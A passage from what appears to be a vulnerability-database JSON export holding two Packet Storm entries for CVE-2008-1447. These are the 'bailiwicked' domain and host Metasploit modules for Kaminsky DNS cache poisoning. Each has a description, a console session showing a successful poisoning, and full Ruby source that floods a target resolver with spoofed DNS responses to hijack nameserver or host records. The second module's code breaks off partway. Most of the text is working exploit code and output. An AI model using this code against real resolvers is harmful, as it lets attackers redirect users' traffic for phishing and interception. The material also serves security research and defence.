packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new 